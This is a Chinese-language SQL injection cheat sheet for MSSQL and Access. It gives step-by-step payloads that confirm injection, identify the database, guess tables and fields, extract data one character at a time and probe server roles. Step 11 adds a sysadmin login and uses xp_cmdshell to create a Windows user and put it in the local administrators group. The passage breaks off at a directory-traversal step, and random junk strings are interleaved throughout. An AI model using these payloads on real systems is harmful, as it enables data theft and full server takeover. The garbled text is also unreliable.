1.判断是否有注入;and 1=1 ;and 1=2 Km7HB!=<
2.初步判断是否是mssql ;and user>0 [xe(FFl+
&ejJf{id
3.注入参数是字符'and [查询条件] and ''=' !C]0l
H`odQkZ!
4.搜索时没过滤参数的'and [查询条件] and '%25'=' `dO)}}| y
Xxhzzm-B
5.判断数据库系统 00X~/'!
Wnm?a!j5
;and (select count(*) from sysobjects)>0 mssql a NhI<.v
9#Gz2u $
;and (select count(*) from msysobjects)>0 access mxt fKPb
Y3KKskhLx
.aTu]i3l_
E&ou(Q={
6.猜数据库 ;and (select Count(*) from [数据库名])>0 @0H}U$l
1AiqB Rs
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 8@pY:AY
3 (Bd`=9
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 =|_:H$94
-T3 z@k
9.(1)猜字段的ascii值(access) =aR'S\<
BV_rk^}Ur
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ~5g2~.&*
' P5ttI#|
(2)猜字段的ascii值(mssql) zg L0v5vk
{=};<;_F
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Qk 2^p^ T6
+ExXhT
10.测试权限结构(mssql) }QrBN:a$(
~IrrX,mp:
L@xag-b
i
^oaFnzJdf
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- B7HNNX
W?is8r:
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- /o%J /|
6%?bl{pNn
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Z&BJ/qk
\-
]U?)_P@}
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,tqMMBwC~_
3Run.Gv\
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- V/xGk9L~
eFJ .)Z
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- *q**,_?;
|e49F
;and 1=(select IS_MEMBER('db_owner'));-- u By[x 0
\[u7y. b
=M39I&N
l`"i'P
11.添加mssql和系统的帐户 {6}H}_(]
\o}m]v
i
;exec master.dbo.sp_addlogin username;-- A9qbE
;exec master.dbo.sp_password null,username,password;-- 5A^$!q P
3jH-!M5
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 3,;;C(
CRXIVver
;exec master.dbo.xp_cmdshell 'net user username password BOqu$f+
b7;`A~{9v
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- hdW}._
,n)f=q*%
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 6jS:_[p
#Xdj:T<*
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- MC=pN(l
Jw "fqr
Q[sj/
i
b$2qy
12.(1)遍历目录 fH{ _X
5ZpU><